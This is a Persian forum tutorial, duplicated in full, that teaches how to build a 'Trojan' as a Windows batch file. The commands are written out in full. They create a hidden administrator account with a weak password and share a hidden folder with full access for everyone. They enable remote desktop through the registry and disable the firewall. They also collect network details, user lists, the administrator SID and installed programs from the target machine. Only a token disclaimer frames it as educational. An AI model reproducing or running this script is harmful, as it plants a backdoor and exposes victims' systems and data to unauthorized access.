twinkle
دوشنبه 24 اسفند 1394, 04:29 صبح
آموزش ساخت Trojan با فرمان های CMD
http://www.hiva-network.com/images/03-edu05/Trojan-00.jpg
سلام به همه شما دوستان و همراهان همیشگی هیوا
در این آموزش، می خواهیم با فرمان های CMD یک Trojan ساده و بی درد سر بسازیم. تروجان ما فقط یک سری اطلاعات را برای ما جمع آوری می کند و راه دسترسی به آن اطلاعات و اطلاعات دیگر را هم فراهم می کند. اگر دوست داشتید می توانید کارهای بیشتری را بر دوش این تروجان بگذارید. کل کارهایی که تروجان کوچولوی ما انجام می دهد به قرار زیر است:
تروجان ما چه کارهایی انجام می دهد؟
ایجاد یک User جدید با دسترسی Admin در کامپیوتر هدف
ایجاد یک پوشه مخفی در درایو ویندوز و Share کردن آن به صورت مخفی با دسترسی User جدید.
فعال کردن Sharing
فعال سازی قابلیت Remote Desktop در کامپیوتر هدف
خاموش کردن Password Protected File Sharing
خاموش کردن فایروال
جمع آوری اطلاعات کامپیوتر شامل موارد زیر:
IP ،Computer Name ، MAC Address ، لیست کاربران، لیست منابع Share شده
و انتقال آن ها به پوشه share شده در درایو ویندوز با نام همان کامپیوتر
لیست برنامه های نصب شده و ورژن آن در کامپیوتر هدف
قبل از شروع:
مواردی که در این مقاله گفته شده فقط جنبه آموزشی دارد و استفاده نادرست از آن به عهده کاربر است.
در این آموزش فقط از فرمان های CMD استفاده شده و از هیچ زبان برنامه نویسی و ابزار خاصی استفاده نشده است.
شروع ساخت Trojan
یک فایل Text ایجاد کنید و فرمان های زیر را در آن بنویسید:
1 – ایجاد یک User جدید با دسترسی Admin
Net user iman 123456 /add
Net localgroup administrators iman /add
2 – الف - ایجاد یک پوشه مخفی در درایو ویندوز
Mkdir c:\Hiva-folder
:C
\cd
attrib hiva-folder +h
2 – ب – Share کردن آن پوشه به صورت مخفی
net share trojan-share$=c:\hiva-folder /grant:iman,full /grant:everyone,full
3 – فعال کردن File and Printer Sharing
netsh firewall set service type = fileandprint mode =enable
4 – فعال کردن Remote Desktop در کامپیوتر هدف
netsh advfirewall firewall set rule group="remote desktop" new enable=Yes
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Contro l\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
5 – به عهده شما ! ( می توانید این مورد را حذف کنید )
6 – خاموش کردن فایروال
Netsh advfirewall set allprofile state off
7 – گرفتن اطلاعات IP ، MAC Address ، لیست کاربران، لیست منابع Share و SID اکانت Administrator
ipconfig >>c:\Hiva-folder\%computername%.txt
getmac >>c:\Hiva-folder\%computername%.txt
net user >>c:\Hiva-folder\%computername%.txt
net share >>c:\Hiva-folder\%computername%.txt
wmic useraccount where name='administrator' get sid >>c:\Hiva-folder\%computername%.txt
8 – لیست برنامه های نصب شده بر روی سیستم هدف
Wmic product get name,version >> c:\Hiva-folder\%computername%.txt
9 - خب حالا عبارت @echo off را در اولین خط این فایل text قرار دهید.
10 - این فایل text را با نام dear-tro و پسوند .bat ذخیره کنید.
نمایی از محتویات فایل dear-tro.bat در برنامه notepad++
http://www.hiva-network.com/images/03-edu05/Trojan-01.png
مرحله هیجان انگیز کار
برای اطمینان از این که Trojan کار می کند، یک بار آن را اجرا می کنیم.
منبع : سایت هیوا شبکه
http://www.hiva-network.com/images/03-edu05/Trojan-00.jpg
سلام به همه شما دوستان و همراهان همیشگی هیوا
در این آموزش، می خواهیم با فرمان های CMD یک Trojan ساده و بی درد سر بسازیم. تروجان ما فقط یک سری اطلاعات را برای ما جمع آوری می کند و راه دسترسی به آن اطلاعات و اطلاعات دیگر را هم فراهم می کند. اگر دوست داشتید می توانید کارهای بیشتری را بر دوش این تروجان بگذارید. کل کارهایی که تروجان کوچولوی ما انجام می دهد به قرار زیر است:
تروجان ما چه کارهایی انجام می دهد؟
ایجاد یک User جدید با دسترسی Admin در کامپیوتر هدف
ایجاد یک پوشه مخفی در درایو ویندوز و Share کردن آن به صورت مخفی با دسترسی User جدید.
فعال کردن Sharing
فعال سازی قابلیت Remote Desktop در کامپیوتر هدف
خاموش کردن Password Protected File Sharing
خاموش کردن فایروال
جمع آوری اطلاعات کامپیوتر شامل موارد زیر:
IP ،Computer Name ، MAC Address ، لیست کاربران، لیست منابع Share شده
و انتقال آن ها به پوشه share شده در درایو ویندوز با نام همان کامپیوتر
لیست برنامه های نصب شده و ورژن آن در کامپیوتر هدف
قبل از شروع:
مواردی که در این مقاله گفته شده فقط جنبه آموزشی دارد و استفاده نادرست از آن به عهده کاربر است.
در این آموزش فقط از فرمان های CMD استفاده شده و از هیچ زبان برنامه نویسی و ابزار خاصی استفاده نشده است.
شروع ساخت Trojan
یک فایل Text ایجاد کنید و فرمان های زیر را در آن بنویسید:
1 – ایجاد یک User جدید با دسترسی Admin
Net user iman 123456 /add
Net localgroup administrators iman /add
2 – الف - ایجاد یک پوشه مخفی در درایو ویندوز
Mkdir c:\Hiva-folder
:C
\cd
attrib hiva-folder +h
2 – ب – Share کردن آن پوشه به صورت مخفی
net share trojan-share$=c:\hiva-folder /grant:iman,full /grant:everyone,full
3 – فعال کردن File and Printer Sharing
netsh firewall set service type = fileandprint mode =enable
4 – فعال کردن Remote Desktop در کامپیوتر هدف
netsh advfirewall firewall set rule group="remote desktop" new enable=Yes
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Contro l\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
5 – به عهده شما ! ( می توانید این مورد را حذف کنید )
6 – خاموش کردن فایروال
Netsh advfirewall set allprofile state off
7 – گرفتن اطلاعات IP ، MAC Address ، لیست کاربران، لیست منابع Share و SID اکانت Administrator
ipconfig >>c:\Hiva-folder\%computername%.txt
getmac >>c:\Hiva-folder\%computername%.txt
net user >>c:\Hiva-folder\%computername%.txt
net share >>c:\Hiva-folder\%computername%.txt
wmic useraccount where name='administrator' get sid >>c:\Hiva-folder\%computername%.txt
8 – لیست برنامه های نصب شده بر روی سیستم هدف
Wmic product get name,version >> c:\Hiva-folder\%computername%.txt
9 - خب حالا عبارت @echo off را در اولین خط این فایل text قرار دهید.
10 - این فایل text را با نام dear-tro و پسوند .bat ذخیره کنید.
نمایی از محتویات فایل dear-tro.bat در برنامه notepad++
http://www.hiva-network.com/images/03-edu05/Trojan-01.png
مرحله هیجان انگیز کار
برای اطمینان از این که Trojan کار می کند، یک بار آن را اجرا می کنیم.
منبع : سایت هیوا شبکه